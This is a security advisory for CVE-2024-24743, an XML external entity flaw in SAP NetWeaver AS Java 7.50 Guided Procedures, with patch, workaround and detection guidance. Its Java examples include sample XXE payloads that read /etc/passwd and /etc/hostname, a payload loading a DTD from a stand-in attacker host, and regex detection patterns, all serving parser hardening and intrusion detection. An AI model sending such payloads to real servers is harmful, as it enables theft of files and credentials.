CVE-2024-24743

8.6 HIGH
XXE

📋 TL;DR

CVE-2024-24743 is an XML external entity (XXE) vulnerability in the Guided Procedures component (CAF) of SAP NetWeaver AS Java 7.50. An unauthenticated attacker who can reach the vulnerable endpoint over the network submits a crafted XML document; when the server parses it, external entities in the DOCTYPE are resolved, letting the attacker read sensitive files and data from the application server. The flaw allows reading only, not modification.

💻 Affected Systems

Products:
  • SAP NetWeaver AS Java
Versions: 7.50
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: Specifically affects the CAF - Guided Procedures component. The attacker needs network access to the vulnerable endpoint but no account or user interaction.

📦 What is this software?

SAP NetWeaver Application Server Java (AS Java) is the Java EE application server of the SAP NetWeaver platform; it hosts components such as the Enterprise Portal, Process Integration and composite applications. Guided Procedures belongs to the Composite Application Framework (CAF) and runs on AS Java; it models and executes multi-step business processes and, per the vendor description, accepts XML input over the network, which is what the vulnerable parser consumes.

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker reads configuration files, credential stores, or other files readable by the AS Java operating-system user, then uses the recovered secrets (database passwords, keystore material, service credentials) for credential theft, data exfiltration, or lateral movement into connected SAP systems.

🟠

Likely Case

Unauthenticated attackers, typically scanning internet-exposed AS Java instances, read application configuration files and expose database credentials, API keys, or other secrets stored on the server.

🟢

If Mitigated

With network access to the Guided Procedures endpoint restricted to trusted sources, the exposure shrinks to insiders or already-compromised internal hosts. The read primitive itself is unchanged until SAP Note 3426111 is applied, so this reduces who can exploit it, not what can be read.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

XXE vulnerabilities typically have low exploitation complexity: a single crafted XML request is enough once the endpoint is known. The vendor description indicates unauthenticated network access is sufficient; no public proof of concept is listed at the time of writing.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply SAP Security Note 3426111 (the note lists the patched software component version for each support package of 7.50)

Vendor Advisory: https://me.sap.com/notes/3426111

Restart Required: Yes

Instructions:

1. Open SAP Note 3426111 in the SAP Support Portal and identify the patched software component version that matches your 7.50 support package.
2. Download the patched component archive from the SAP Software Download Center and deploy it to every affected AS Java instance (Software Update Manager is the standard tool; SNOTE is an ABAP transaction and does not apply to the Java stack).
3. Restart the AS Java instance so the patched component is loaded.

🔧 Temporary Workarounds

Network Access Restriction

Platform: all

Restrict network access to SAP NetWeaver AS Java endpoints to trusted sources only

XML Parser Hardening

Platform: all

Configure XML parsers to disable DOCTYPE declarations and external entity resolution. Note that the parser in the Guided Procedures component is shipped by SAP and is not customer-configurable, so this only helps for custom code deployed on the same AS Java; for the vulnerable component itself the note is the fix.
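As an added example (not SAP code and not the patch), the following Java shows what the hardening above means in practice for custom AS Java applications: a default JAXP DocumentBuilderFactory resolves the SYSTEM entity in a constructed XXE payload, while the hardened factory rejects the DOCTYPE before any entity is fetched. The payload and class names are illustrative; the feature URIs are the standard Xerces/JAXP ones.

```java
import javax.xml.parsers.DocumentBuilderFactory;
import java.io.StringReader;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class XxeParserDemo {
    // Constructed XXE payload: an external entity pointing at a local file.
    // The vulnerable component would receive something like this inside a request body.
    static final String PAYLOAD =
        "<?xml version=\"1.0\"?>\n" +
        "<!DOCTYPE process [<!ENTITY xxe SYSTEM \"file:///etc/hostname\">]>\n" +
        "<process><name>&xxe;</name></process>";

    // Vulnerable pattern: default factory, external entities and DTD loading enabled.
    static Document parseUnsafe(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        return f.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
    }

    // Hardened pattern: forbid DOCTYPE outright, and disable entity resolution,
    // external DTD loading and XInclude for parsers that ignore the first flag.
    static Document parseSafe(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
    }

    public static void main(String[] args) throws Exception {
        // The unsafe parser resolves &xxe; and returns the file content as the element text.
        Document d = parseUnsafe(PAYLOAD);
        System.out.println("unsafe parser returned: "
            + d.getElementsByTagName("name").item(0).getTextContent().trim());

        // The hardened parser fails fast on the DOCTYPE and never touches the filesystem.
        try {
            parseSafe(PAYLOAD);
            System.out.println("hardened parser accepted payload (unexpected)");
        } catch (SAXParseException e) {
            System.out.println("hardened parser rejected payload: " + e.getMessage());
        }
    }
}
```

Disallowing the DOCTYPE is the decisive setting: it stops both file-reading and blind (out-of-band) XXE and also removes entity-expansion denial of service. If an application genuinely needs a DTD, keep the remaining four settings and validate against a local schema instead.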

🧯 If You Can't Patch

  • Implement strict network segmentation so only trusted networks and reverse proxies can reach the AS Java HTTP ports
  • Deploy a web application firewall (WAF) in front of AS Java with rules that block XML bodies containing DOCTYPE declarations or entity definitions on the Guided Procedures paths
  • Restrict outbound connections from the application server so an attacker cannot exfiltrate file contents via external DTDs or out-of-band entity requests

🔍 How to Verify

Check if Vulnerable:

Check whether the instance runs SAP NetWeaver AS Java 7.50 with the Guided Procedures (CAF) component deployed at a version below the patched level given in SAP Note 3426111

Check Version:

On the Java stack, open http://<host>:<port>/sap/monitoring/ComponentInfo (or NetWeaver Administrator, System Information) and read the version and patch level of the CAF / Guided Procedures software component. SAP GUI's System → Status shows the ABAP stack and is not relevant to AS Java.

Verify Fix Applied:

Confirm on the same ComponentInfo page that the deployed component version is at or above the patched level listed in SAP Note 3426111 and that the instance has been restarted since deployment. Transaction SNOTE does not track Java-stack corrections.

📡 Detection & Monitoring

Log Indicators:

  • XML uploads to Guided Procedures endpoints from sources that do not normally use the component, especially from outside the corporate network
  • Repeated XML parsing errors in the AS Java default trace, which can indicate payload tuning before a successful read

Network Indicators:

  • HTTP POST requests with XML content to /CAF/GuidedProcedures endpoints (confirm the exact path in your landscape), particularly bodies containing <!DOCTYPE with SYSTEM or PUBLIC identifiers
  • Outbound HTTP or FTP connections from the application server to unknown hosts, the signature of out-of-band XXE exfiltration

Host Indicators:

  • Reads of configuration or credential files by the AS Java process that do not correspond to normal startup or administration activity

SIEM Query:

source="sap_netweaver" AND (uri_path="/CAF/GuidedProcedures/*" AND content_type="application/xml")

Adapt the source name, field names and path to your log pipeline. This query only scopes requests to the endpoint; it cannot see the body, so pair it with WAF or reverse-proxy inspection for DOCTYPE declarations.
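The body-level check the SIEM query cannot perform, as an added example that is not part of the original page: a screening function of the kind a servlet filter or WAF rule would apply, run here over constructed request records (method, path, content type, body snippet; not real SAP logs). The /CAF/GuidedProcedures prefix is the one given in the indicators above and must be confirmed for your deployment; the assumption that legitimate uploads never carry a DTD is an assumption.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public class XxeRequestScreen {
    // Path prefix from this page's network indicators; verify against your landscape.
    static final String GP_PREFIX = "/CAF/GuidedProcedures";

    // Flags a DOCTYPE that references an external resource, or any entity declaration.
    // Assumption: legitimate Guided Procedures uploads never need a DTD.
    static final Pattern EXTERNAL_DTD = Pattern.compile(
        "<!DOCTYPE[^>]*\\b(SYSTEM|PUBLIC)\\b|<!ENTITY\\b", Pattern.CASE_INSENSITIVE);

    // Constructed records: method|path|content-type|body snippet.
    static final String[] RECORDS = {
        "POST|/CAF/GuidedProcedures/upload|application/xml|<?xml version=\"1.0\"?><process><name>Onboarding</name></process>",
        "POST|/CAF/GuidedProcedures/upload|application/xml|<?xml version=\"1.0\"?><!DOCTYPE p [<!ENTITY x SYSTEM \"file:///etc/passwd\">]><process>&x;</process>",
        "POST|/CAF/GuidedProcedures/upload|text/xml|<!DOCTYPE p SYSTEM \"http://attacker.example/evil.dtd\"><process/>",
        "GET|/CAF/GuidedProcedures/list|text/html|",
        "POST|/irj/portal|application/xml|<!DOCTYPE p [<!ENTITY x SYSTEM \"file:///etc/passwd\">]><p>&x;</p>",
    };

    // Matches application/xml, text/xml and the +xml structured suffix.
    static boolean isXmlContent(String contentType) {
        String ct = contentType.toLowerCase();
        return ct.contains("/xml") || ct.endsWith("+xml");
    }

    // True when a POST with an XML body to the Guided Procedures path carries a DTD.
    static boolean looksLikeXxe(String method, String path, String contentType, String body) {
        return "POST".equals(method)
            && path.startsWith(GP_PREFIX)
            && isXmlContent(contentType)
            && EXTERNAL_DTD.matcher(body).find();
    }

    // Returns the indices of records that should raise an alert.
    static List<Integer> flagged(String[] records) {
        List<Integer> hits = new ArrayList<>();
        for (int i = 0; i < records.length; i++) {
            String[] f = records[i].split("\\|", -1); // -1 keeps the empty body on GETs
            if (f.length == 4 && looksLikeXxe(f[0], f[1], f[2], f[3])) {
                hits.add(i);
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        System.out.println("flagged record indices: " + flagged(RECORDS));
    }
}
```

The last record (a DTD posted to a different path) is deliberately not flagged by this rule, which is scoped to the vulnerable component; a DOCTYPE on any XML endpoint is still worth a lower-priority alert. Because standard HTTP access logs omit request bodies, this check has to run where the body is visible: a reverse proxy or WAF, or a filter in front of the application.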
